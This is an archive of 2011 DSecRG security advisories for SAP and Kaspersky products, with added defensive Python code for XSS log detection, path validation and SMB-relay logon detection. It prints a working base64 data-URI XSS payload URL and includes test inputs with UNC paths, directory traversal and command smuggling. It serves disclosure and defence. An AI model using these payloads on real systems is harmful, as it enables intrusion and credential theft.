[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay

2011-11-17 Thread Alexandr Polyakov
[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay

A security vulnerability was found in the SAP EPS_DELETE_FILE RFC function which 
allows an attacker to delete files remotely or steal hashes of the SAP server 
account in a Windows environment using an SMBRelay attack.


Digital Security Research Group [DSecRG] Advisory (Internal #DSECRG-00195)

Application: SAP NetWeaver ABAP
Versions Affected: SAP NetWeaver ABAP
Vendor URL: www.sap.com
Bugs: Auth bypass, directory traversal, smbrelay
Exploits: YES
Reported: 15.01.2011
Vendor response: 25.01.2011
Date of Public Advisory: 22.08.2011
CVE-number:
Author: Alexey Sintsov from DSecRG (ERPScan subdivision)

Description
***

A security vulnerability was found in the SAP EPS_DELETE_FILE RFC function which 
allows an attacker to delete files remotely or steal hashes of the SAP server 
account in a Windows environment using an SMBRelay attack.

Details
***
An attacker can execute the function EPS_DELETE_FILE remotely using default SAP 
accounts like TMSADM or SAPCPIC to delete any file in the OS, send hashes of the 
SAP account to a remote host, or conduct an SMBRelay attack.

Example:
**
A working exploit will be available in the commercial scanner ERPScan Security 
Scanner for SAP (http://erpscan.com) and also in the ERPScan pentesting tool.

References
**
http://dsecrg.com/pages/vul/show.php?id=331
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1554030


Fix Information
*
The solution to this issue is given in SAP Security Note 1554030.


About DSecRG
***
The main mission of DSecRG is to conduct research on business-critical systems 
such as ERP, CRM, SRM, BI, SCADA, banking software and others. The results of 
this work are then integrated into ERPScan Security Scanner. Being on the 
cutting edge of ERP and SAP security, DSecRG research helps to improve the 
quality of ERPScan consulting services and protects you from the latest threats.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com 

About ERPScan
***
ERPScan is an innovative company engaged in the research of ERP security and 
develops products for ERP system security assessment. Apart from this, the 
company renders consulting services for secure configuration, development and 
implementation of ERP systems, and conducts comprehensive assessments and 
penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and the service 
ERPScan Online, which help customers perform automated security assessments and 
compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com

Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@erpscan.com

www.erpscan.com
www.dsecrg.com


---
This message and any attachment are confidential and may be privileged or 
otherwise protected from disclosure. If you are not the intended recipient any 
use, distribution, copying or disclosure is strictly prohibited. If you have 
received this message in error, please notify the sender immediately either by 
telephone or by e-mail and delete this message and any attachment from your 
system. Correspondence via e-mail is for information purposes only. Digital 
Security neither makes nor accepts legally binding statements by e-mail unless 
otherwise agreed.
---



[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose

2011-11-17 Thread Alexandr Polyakov

[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose 

The com.sap.ipc.webapp.ipcpricing application has an information disclosure 
vulnerability.


Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal 
DSecRG-00197)

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Information disclosure
Exploits: YES
Reported: 27.01.2011
Vendor response: 28.01.2011
Date of Public Advisory: 15.09.2011
CVE-number:
Author: Dmitriy Chastuchin from Digital Security Research Group [DSecRG] 
(research [at] dsecrg [dot] com)


Description
***

The com.sap.ipc.webapp.ipcpricing application has an information disclosure 
vulnerability.


Details
***

Will be disclosed at Brucon 

Example:
**
A working exploit will be available in the commercial scanner ERPScan Security 
Scanner for SAP (http://erpscan.com) and also in the ERPScan pentesting tool.

References
**
http://dsecrg.com/pages/vul/show.php?id=332
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1545883



Fix Information
*
The solution to this issue is given in SAP Security Note 1545883.





[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose

2011-11-17 Thread Alexandr Polyakov
[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose

An attacker can get information about the mobile engine version and sometimes 
the name of the technical user.

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver MI 2
Vendor URL: http://www.SAP.com
Bugs: Information disclosure
Reported: 29.07.2011
Vendor response: 30.07.2011
Date of Public Advisory: 11.11.2011
CVSS:
CVE-number:
Author: Alexander Polyakov from DSecRG (research center of ERPScan)

Description
***
An attacker can get information about the mobile engine version and sometimes 
the name of the technical user.

Details
***
An information disclosure vulnerability was found in SAP NetWeaver Mobile Engine 
which can help an attacker to find information about the installed version and 
patch level of NetWeaver and also to get a username.

Example:
**
A working exploit is available in the commercial scanner ERPScan Security Scanner 
for SAP (http://erpscan.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=334





Fix Information
*
This SatFileReceiver servlet is not shipped with MI 2. 7.02 or 7.31. It was used 
in MI 2.1, which is no longer supported.

You should disable this application.




[DSECRG-11-037] SAP BW Doc - Multiple XSS

2011-11-17 Thread Alexandr Polyakov
[DSECRG-11-037] SAP BW Doc - Multiple XSS

The BW DOC metadata application in SAP NetWeaver is vulnerable to XSS attacks.

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: XSS
Reported: 14.03.2011
Vendor response: 16.03.2011
Date of Public Advisory: 11.11.2011
CVSS: 4.3
CVE-number:
Author: Alexandr Polyakov and Dmitriy Chastuchin from DSecRG (research center 
of ERPScan)

Description
***
The BW DOC metadata application in SAP NetWeaver is vulnerable to XSS attacks.

Details
***
XSS found in the page /SAP/BW/DOC/METADATA/
Vulnerable parameter: page
To avoid the XSS protection we use base64 encoding and the DATA tag.

Example:
**

http://[SAPSERVER]/SAP/BW/DOC/METADATA/?page=%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E

References
**
http://erpscan.com/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1572325






Fix Information
*
The solution to this issue is given in SAP Security Note 1572325.


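The bypass in this advisory hides the script inside a base64 data: URI that an object tag loads, so a check that only looks for a literal script tag in the raw request misses it. The detection routine below is an added example written for this page, not code from the advisory, ERPScan or SAP: it percent-decodes the page parameter on the advisory's path, flags active tags and data: URIs, and decodes the base64 body so the analyst sees what the filter let through; the access log lines are constructed.

```python
"""Detect the object/data:-URI XSS pattern from DSECRG-11-037 in web server
access logs. Added illustration for this advisory; not ERPScan's or SAP's code.
The log lines are constructed; the path and the "page" value of the second line
are taken from the advisory's example URL."""
import base64
import binascii
import re
from urllib.parse import urlsplit, unquote_plus

# Tags that can load a data: URI (or inline script) as an active document.
ACTIVE_TAG_RE = re.compile(r"<\s*(object|embed|iframe|script|svg)\b", re.I)
# data:<mediatype>[;params];base64,<body>
DATA_URI_RE = re.compile(
    r"data:([\w/+.-]*)(;[^,\"'\s]*)?;base64,([A-Za-z0-9+/=]+)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WATCHED_PATH = "/SAP/BW/DOC/METADATA"

# Constructed access log: one benign request, one carrying the advisory's payload.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Nov/2011:10:01:02 +0300] "GET /SAP/BW/DOC/METADATA/?page=overview HTTP/1.1" 200 512
10.0.0.9 - - [17/Nov/2011:10:01:09 +0300] "GET /SAP/BW/DOC/METADATA/?page=%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E HTTP/1.1" 200 4096
"""


def query_params(query):
    """Split on '&' and percent-decode once, mirroring what the server sees
    ('+' becomes a space, as servers treat it in query strings)."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def decode_data_uri(value):
    """Return the decoded body of the first base64 data: URI in value, else None."""
    m = DATA_URI_RE.search(value)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(3), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def inspect_request(target):
    """Inspect one request target; return a finding dict or None.

    A finding is raised when the watched path's "page" parameter carries an
    active tag or a data: URI. The base64 body is decoded so the analyst sees
    the script the filter let through rather than an opaque blob."""
    parts = urlsplit(target)
    if not parts.path.upper().startswith(WATCHED_PATH):
        return None
    for page in query_params(parts.query).get("page", []):
        has_tag = bool(ACTIVE_TAG_RE.search(page))
        decoded = decode_data_uri(page)
        if has_tag or decoded is not None:
            return {"path": parts.path, "page_param": page,
                    "active_tag": has_tag, "data_uri_payload": decoded}
    return None


def scan_log(text):
    """Run inspect_request over every request line in an access log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            finding = inspect_request(m.group(1))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("suspicious request to", f["path"])
        print("  page =", f["page_param"])
        print("  decoded data: URI body =", f["data_uri_payload"])
```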



[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability

2011-11-17 Thread Alexandr Polyakov


[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability 

The SAP RSTXSCRP report has a path traversal vulnerability which can lead to an 
SMB relay attack and full control of the system.

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Path traversal, SMBRelay
Reported: 14.03.2011
Vendor response: 16.03.2011
Date of Public Advisory: 11.11.2011
CVSS: 2.1
CVE-number:
Author: Dmitriy Chastuchin from DSecRG (research center of ERPScan)

Description
***
The SAP RSTXSCRP report has a path traversal vulnerability which can lead to an 
SMB relay attack and full control of the system.

Details
***
Using transaction SA38 and report RSTXSCRP, an attacker can insert a malicious 
UNC path in the File Name field and choose the radio button From/on application 
server.
For a successful SMB Relay attack the attacker must force the server to initiate 
an SMB session to the attacker's server via the UNC path request. The SMB client 
will try to access a remote SMB service on the attacker's machine.

Example:
**
A working exploit is available in the commercial scanner ERPScan Security Scanner 
for SAP (http://erpscan.com).

References
**
http://erpscan.com/advisories/dsecrg-11-038-sap-rstxscrp-report-smb-relay-vulnerability/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1583286




Fix Information
*
The solution to this issue is given in SAP Security Note 1583286.


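This advisory and DSECRG-11-031 above share one root cause: a user-controlled file name reaches the OS unchecked, so a UNC path makes the server's SMB client authenticate outward and traversal sequences reach files outside the intended directory. The validation routine below is an added example written for this page, not SAP's code and not the fix delivered in the referenced notes; APP_SERVER_ROOT and the test inputs are constructed.

```python
"""Validate a user-supplied "file name on application server" before it reaches
the OS, rejecting the UNC and traversal inputs described in DSECRG-11-031
(EPS_DELETE_FILE) and DSECRG-11-038 (RSTXSCRP). Added illustration only; it is
not SAP's code and not the fix delivered in the referenced notes.
APP_SERVER_ROOT is an assumed directory chosen for the example."""
import posixpath
import re

APP_SERVER_ROOT = "/usr/sap/trans/data"  # assumed allowed directory

# \\host\share and //host/share make the SMB client connect to "host",
# which is the outbound authentication an SMB relay attack needs.
UNC_RE = re.compile(r"^(\\\\|//)")
DRIVE_RE = re.compile(r"^[A-Za-z]:")                   # C:\... style absolute path
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]+:")   # file:, smb:, http: ...
COMPONENT_RE = re.compile(r"^[A-Za-z0-9._-]+$")        # tight per-component charset


def reject_reason(user_value):
    """Return None if user_value is an acceptable relative path, else a reason code."""
    if not user_value or len(user_value) > 255:
        return "empty-or-long"
    value = user_value.strip()
    normalised = value.replace("\\", "/")  # treat Windows and UNIX separators alike
    if UNC_RE.match(normalised):
        return "unc"
    if DRIVE_RE.match(value) or normalised.startswith("/"):
        return "absolute"
    if SCHEME_RE.match(value):
        return "scheme"
    for part in normalised.split("/"):
        if part in ("", ".", ".."):
            return "traversal"
        if not COMPONENT_RE.match(part):
            return "charset"
    return None


def safe_app_server_path(user_value, root=APP_SERVER_ROOT):
    """Map an accepted value to an absolute path and prove it stays under root."""
    reason = reject_reason(user_value)
    if reason is not None:
        raise ValueError(f"rejected file name ({reason}): {user_value!r}")
    relative = user_value.strip().replace("\\", "/")
    full = posixpath.normpath(posixpath.join(root, relative))
    # The component checks already exclude "..", but the containment test
    # guards against future loosening of the allowlist.
    if not full.startswith(root.rstrip("/") + "/"):
        raise ValueError(f"path escapes root: {full}")
    return full


# Constructed inputs: one legitimate name and the shapes the advisories describe,
# each paired with the reason code the validator should return.
CASES = {
    "reports/form1.itf": None,
    r"\\10.0.0.1\share\form1.itf": "unc",      # UNC: outbound SMB, hashes leak
    "//10.0.0.1/share/form1.itf": "unc",
    r"..\..\etc\passwd": "traversal",
    "../../../etc/passwd": "traversal",
    r"C:\Windows\win.ini": "absolute",
    "/etc/passwd": "absolute",
    "file://10.0.0.1/share/x": "scheme",
    "form1.itf;rm": "charset",
}


def run_cases(cases=CASES):
    """Return {input: reason} for every constructed case."""
    return {value: reject_reason(value) for value in cases}


if __name__ == "__main__":
    for value, reason in run_cases().items():
        outcome = reason or "accepted: " + safe_app_server_path(value)
        print(f"{value!r:35} -> {outcome}")
```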



[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW)

2011-11-17 Thread Alexandr Polyakov


[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability 
(NEW) 

The TH_GREP report is vulnerable to a command execution vulnerability which still 
works with the previous patch (note 1433101). Remote OS command execution is 
possible.

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Command execution
Reported: 08.04.2011
Vendor response: 09.04.2011
Date of Public Advisory: 11.11.2011
CVSS: 6.0
CVE-number:
Author: Alexey Tyurin from DSecRG (research center of ERPScan)

Description
***
The TH_GREP report is vulnerable to a command execution vulnerability which still 
works with the previous patch (note 1433101). Remote OS command execution is 
possible.

Details
***
This vulnerability exists in the patched version (note 1433101) because this note 
secures only Linux, but we found that Windows is vulnerable too.
There is the ability for command execution via the SA TH_GREP RFC function on OS 
Windows.
The problem lies in the absence of user input validation of the TH_GREP 
RFC function's parameters. An attacker can insert malicious code in the 
STRING parameter for command execution.
There are at least 3 ways of command execution, and the attacker must have valid 
credentials:
1) In transaction SE37
2) via the startrfc command with the TH_GREP RFC function
3) via a crafted TH_GREP RFC-SOAP request

Example:
**
A working exploit is available in the commercial scanner ERPScan Security Scanner 
for SAP (http://erpscan.com).

References
**
http://erpscan.com/advisories/dsecrg-11-039-sap-netweaver-th_grep-module-code-injection-vulnerability-new/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1580017




Fix Information
*
The solution to this issue is given in SAP Security Note 1580017.





[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation

2011-11-17 Thread Alexandr Polyakov


[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation 

An attacker can create a new user in the J2EE Engine using a CSRF attack on the 
SPML service.

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: CSRF
Reported: 14.03.2011
Vendor response: 15.03.2011
Date of Public Advisory: 11.11.2011
CVSS: 7.3
CVE-number:
Author: Alexandr Polyakov from DSecRG (research center of ERPScan)

Description
***
An attacker can create a new user in the J2EE Engine using a CSRF attack on the 
SPML service.

Details
***
The SPML service can be used to perform various actions including user 
management, role management, etc.
An attacker can generate an HTTP page with an XML call to the SPML service and 
send a link to the administrator.

Example:
**
A working exploit is available in the commercial scanner ERPScan Security Scanner 
for SAP (http://erpscan.com).

References
**
http://erpscan.com/advisories/dsecrg-11-040-sap-netweaver-spml-xml-csrf-user-creation/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1616058
http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf





Fix Information
*
The solution to this issue is given in SAP Security Note 1616058.





[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering)

2011-11-17 Thread Alexandr Polyakov

[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering) 

An authentication bypass vulnerability in the SAP NetWeaver CTC service can be 
exploited for unauthorized user management and OS command execution.

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Auth bypass, Verb tampering
Reported: 14.03.2011
Vendor response: 15.03.2011
Date of Public Advisory: 11.11.2011
CVSS: 7.3 by SAP (10 by ERPSCAN)
CVE-number:
Author: Alexandr Polyakov from DSecRG (research center of ERPScan)

Description
***
An authentication bypass vulnerability in the SAP NetWeaver CTC service can be 
exploited for unauthorized user management and OS command execution.

Details
***
An attacker can bypass authentication using a Verb Tampering vulnerability.

Example:
**
A working exploit is available in the commercial scanner ERPScan Security Scanner 
for SAP (http://erpscan.com).

References
**
http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1589525
http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf




Fix Information
*
The solution to this issue is given in SAP Security Notes 1589525 and 1624450.



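Verb tampering works because a servlet security constraint that lists http-method elements applies only to those methods, so a request using any other verb reaches the resource with no role check at all. The model below is an added example of that general rule from the Servlet specification, not the CTC service's actual deployment descriptor (which the advisory does not show); the constraint path and the verb list are constructed.

```python
"""Model of why HTTP verb tampering defeats a servlet security constraint, the
bug class named in DSECRG-11-041. Added illustration of the general
<security-constraint> rule; not the CTC service's real deployment descriptor.
The URL pattern and verbs below are constructed."""
from dataclasses import dataclass, field


def url_matches(pattern, path):
    """Servlet-style URL pattern match: exact, path prefix '/x/*', or '*.ext'."""
    if pattern.endswith("/*"):
        prefix = pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if pattern.startswith("*."):
        return path.endswith(pattern[1:])
    return path == pattern


@dataclass
class SecurityConstraint:
    url_patterns: list
    # Servlet spec: an empty http_methods list means the constraint covers every
    # method; a non-empty list covers only the listed ones.
    http_methods: list = field(default_factory=list)
    roles: list = field(default_factory=list)

    def covers(self, method, path):
        if not any(url_matches(p, path) for p in self.url_patterns):
            return False
        return not self.http_methods or method.upper() in self.http_methods


def authorize(constraints, method, path, user_roles):
    """Return True if the container lets the request through.

    A request no constraint covers is open to everyone; that is the container's
    default and exactly what a verb-tampering request relies on."""
    applicable = [c for c in constraints if c.covers(method, path)]
    if not applicable:
        return True
    return all(set(c.roles) & set(user_roles) for c in applicable)


# Weak: the administrative path is protected only for the verbs someone listed.
WEAK = [SecurityConstraint(["/admin/*"], ["GET", "POST"], ["Administrator"])]
# Hardened: no http-method list, so every verb, including HEAD and unknown
# ones, is subject to the role check.
HARDENED = [SecurityConstraint(["/admin/*"], [], ["Administrator"])]

PROBE_VERBS = ("GET", "POST", "HEAD", "PUT", "DELETE", "FOO")


def unauthenticated_verbs(constraints, path, verbs=PROBE_VERBS):
    """Verbs with which a client holding no roles is let through to path."""
    return [v for v in verbs if authorize(constraints, v, path, [])]


if __name__ == "__main__":
    print("weak     :", unauthenticated_verbs(WEAK, "/admin/example"))
    print("hardened :", unauthenticated_verbs(HARDENED, "/admin/example"))
```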



[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked XSS vulnerability

2011-11-17 Thread Alexandr Polyakov

[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked XSS vulnerability

An XSS vulnerability was found in the pubDBLogon.jsp page of SAP Crystal Report 
Server 2008.


Application: SAP Crystal Report Server 2008
Versions Affected: SAP Crystal Report Server 2008
Vendor URL: http://www.sap.com
Bugs: Linked XSS Vulnerability 
Exploits: YES
Reported: 09.12.2010
Vendor response: 10.12.2010
Date of Public Advisory: 15.09.2011 
Authors: Dmitry Chastuhin



Description

SAP Crystal Report Server 2008 contains a variety of features with which users 
can manage and share interactive reports and dashboards, as well as provide 
access to them via the Internet.


Details
**
The vulnerability was discovered in the JSP page pubDBLogon.jsp. Vulnerable 
parameter: service.
Any user can craft a vulnerable link and steal a user's or Administrator's cookie.

References
**
http://dsecrg.com/pages/vul/show.php?id=333
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1562292


Fix Information
*
The solution to this issue is given in SAP Security Note 1562292.





CFP for first independent international Security Conference in Russia - ZeroNights (by Defcon-Russia)

2011-09-16 Thread Alexandr Polyakov


http://zeronights.org/request

Saint-Petersburg, Russia, 25th of November
The CFP consists of 2 steps.

Participation requests for the first step are accepted until 20.09.11.
The program committee decision about the first part of the speakers will be 
available on 30.09.11.

Participation requests for the second step are accepted until 20.10.11.
The final program committee decision will be available on 30.10.11.

The requests should be sent to c...@zeronights.ru.

The speaker's request must consist of:

Name and surname
E-mail
Biography (in short)
Job, position
Residence
Report name
Brief description of presentation (not more than 500 words, this is description 
for web-site)
Full description (technical details):
whether 0-day vulnerabilities will be described
whether any tools will be presented at the conference
Topic status (if it was previously shown/published; if yes, when and where)
Personal requirements for the presentation

We are highly interested in the following topics:

Corporate application security
Security of applications and services operating with financial funds
State project security
SCADA security
Communication systems security
Russian software security
Mobile device security
Malicious software
Social networks and Web 2.0 hacking
Program research without source code
Vulnerability search and exploitation
Software, hardware and network research

This topic list is not exhaustive but preferred. Presentations on other subjects 
can be considered as well.

We do not accept marketing talks or talks aimed at selling any products without 
technical information.

Slides/talk must be presented in Russian or English.

As a speaker, you will receive a partial refund of your travel expenses.

A good mood, a pleasant community and a lot of unforgettable feelings in the 
northern capital of Russia are guaranteed.





Polyakov Alexander. QSA,PA-QSA
CTO ERPScan
Head of DSecRG



[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose (by ERPScan)

2011-09-16 Thread Alexandr Polyakov
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose

The com.sap.ipc.webapp.ipcpricing application has an information disclosure vulnerability.


Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal 
DSecRG-00197)

Application: SAP NetWeaver
Versions Affected: SAP NetWeaver
Vendor URL: http://www.SAP.com
Bugs: Information disclosure
Exploits: YES
Reported: 27.01.2011
Vendor response: 28.01.2011
Date of Public Advisory: 15.09.2011
CVE-number:
Author: Dmitriy Chastuchin from DSecRG (subdivision of ERPScan)


Description
***

The com.sap.ipc.webapp.ipcpricing application has an information disclosure vulnerability.


Details
***

Details will be disclosed at BruCON.

Example:
**
A working exploit will be available in the commercial ERPScan Security Scanner for SAP (http://erpscan.com) and in the ERPScan pentesting tool.

References
**
http://erpscan.com/advisories/dsecrg-11-032-sap-netweaver-ipcpricing-information-disclose/
http://dsecrg.com/pages/vul/show.php?id=332
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1545883



Fix Information
*
The solution to this issue is given in SAP Security Note 1545883.


About DSecRG
***
The main mission of DSecRG is to conduct research on business-critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The results of this work are then integrated into ERPScan Security Scanner. Being at the leading edge of ERP and SAP security, DSecRG research helps improve the quality of ERPScan consulting services and protects you from the latest threats.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

About ERPScan
***
ERPScan is an innovative company engaged in ERP security research that develops products for ERP system security assessment. Apart from this, the company provides consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions.
Our flagship products are ERPScan Security Scanner for SAP and the ERPScan Online service, which help customers perform automated security assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com








[DSECRG-11-018] Kaspersky administration Kit - Remote code execution via SMBRelay

2011-04-25 Thread Alexandr Polyakov


Digital Security Research Group [DSecRG] Advisory   #DSECRG-11-018

Application: Kaspersky Administration Kit
Versions Affected:   from 6.0
Vendor URL:  http://www.kaspersky.com
Bug: Design flaw
Exploits:YES
Reported:22.01.2011
Vendor response: 22.01.2011
Solution:disable IP scan
Date of Public Advisory: 14.03.2011
Authors: Alexey Sintsov of Digital Security Research Group 
[DSecRG]



Description
***

The service account used by Kaspersky Administration Kit, together with its functionality, makes it possible to attack other hosts in a corporate network.

Details
***

The function called Scan IP subnets is enabled by default in Kaspersky Administration Kit 6. This function performs an ICMP scan and also tries to use the SMB protocol with the service account, which can be used to run an SMBRelay attack and gain full control of a secured network. By default, Scan IP subnets scans the subnet every 7 hours. An attacker just needs to run an SMBRelay tool and wait. The attack is possible because the Kaspersky service account has administrative rights on hosts in the corporate network. This means that an attacker can attack any server or workstation where this service account has rights.

Fix Information
***

1) Do not run the Administration Server service under a Domain Administrator account or a domain account that is a member of the local administrators group on other hosts.
2) Disable Scan IP subnets.


http://support.kaspersky.com/faq/?qid=208284121 
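A defender-side check for the exposure described above, added here as an example that is not part of the advisory: it walks Windows Security event 4624 records and flags successful NTLM network logons of the Administration Server's service account that originate from a host other than the Administration Server itself, which is the footprint a relayed scan authentication leaves on the target host. The service account name, the Administration Server address and the flattened record layout are assumptions, and the event records are constructed sample data.

```python
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

# Assumed values (not from the advisory): the domain account the Kaspersky
# Administration Server service runs under, and the address(es) from which that
# account is legitimately expected to authenticate (the Administration Server).
SERVICE_ACCOUNT = "CORP\\svc_kavadmin"
ADMIN_SERVER_ADDRESSES = {"10.0.0.5"}

# Constructed sample of Security event 4624/4625 records flattened to one
# "key=value" record per line. Field names follow the 4624 event (logon type,
# authentication package, account, source address, target host); the flat
# layout itself is an assumption made for this example.
SAMPLE_EVENTS = """\
EventID=4624 LogonType=3 AuthPkg=NTLM Account=CORP\\svc_kavadmin Source=10.0.0.5 Target=WS-017
EventID=4624 LogonType=3 AuthPkg=NTLM Account=CORP\\svc_kavadmin Source=10.0.0.77 Target=FILESRV01
EventID=4624 LogonType=3 AuthPkg=Kerberos Account=CORP\\svc_kavadmin Source=10.0.0.5 Target=WS-018
EventID=4624 LogonType=2 AuthPkg=NTLM Account=CORP\\jdoe Source=127.0.0.1 Target=WS-019
EventID=4624 LogonType=3 AuthPkg=NTLM Account=CORP\\svc_kavadmin Source=10.0.0.77 Target=DC01
EventID=4625 LogonType=3 AuthPkg=NTLM Account=CORP\\svc_kavadmin Source=10.0.0.77 Target=DC01
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


@dataclass(frozen=True)
class RelayFinding:
    source: str   # host that presented the service account's credentials
    target: str   # host that accepted them
    raw: str      # the original record, kept for the analyst


def parse_event(line: str) -> dict:
    """Split one flattened record into a field dictionary."""
    return dict(FIELD_RE.findall(line))


def is_unexpected_ntlm_logon(ev: dict) -> bool:
    """True for a successful NTLM network logon of the service account that did
    not come from the Administration Server. A relayed authentication is accepted
    by the target as coming from the relaying host, so the source address, not
    the account name, is what gives it away."""
    return (
        ev.get("EventID") == "4624"
        and ev.get("LogonType") == "3"          # network logon, i.e. SMB
        and ev.get("AuthPkg") == "NTLM"         # relay works on NTLM, not Kerberos
        and ev.get("Account") == SERVICE_ACCOUNT
        and ev.get("Source") not in ADMIN_SERVER_ADDRESSES
    )


def find_relay_candidates(event_text: str) -> list[RelayFinding]:
    """Return one finding per record that matches is_unexpected_ntlm_logon."""
    findings = []
    for line in event_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if is_unexpected_ntlm_logon(ev):
            findings.append(RelayFinding(ev["Source"], ev["Target"], line))
    return findings


def fan_out_by_source(findings: list[RelayFinding]) -> dict[str, set[str]]:
    """Group targets per unexpected source. One rogue host reaching several
    targets with the scanner's account is the fan-out the advisory describes."""
    by_source: dict[str, set[str]] = defaultdict(set)
    for f in findings:
        by_source[f.source].add(f.target)
    return dict(by_source)


if __name__ == "__main__":
    hits = find_relay_candidates(SAMPLE_EVENTS)
    for src, targets in fan_out_by_source(hits).items():
        print(f"{SERVICE_ACCOUNT} accepted from unexpected host {src} on {sorted(targets)}")
```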


References
*

http://dsecrg.ru/pages/vul/show.php?id=318
http://dsecrg.blogspot.com/2011/03/smbrelay-bible-4-smbrelay-with-no.html





Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone:  +7 812 703 1547
+7 812 430 9130
e-mail: a.polya...@dsec.ru  

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru





[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS

2011-03-16 Thread Alexandr Polyakov
 
[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS 

SAP NetWeaver Integration Directory has linked XSS vulnerability. 

Digital Security Research Group [DSecRG] Advisory DSecRG-11-013 (Internal 
DSecRG-00163)

Application: SAP NetWeaver Runtime
Versions Affected:   SAP NetWeaver Runtime
Vendor URL:  http://www.sap.com
Bugs:Linked XSS and Stored XSS
Exploits:YES
Reported:11.05.2010
Vendor response: 12.05.2010
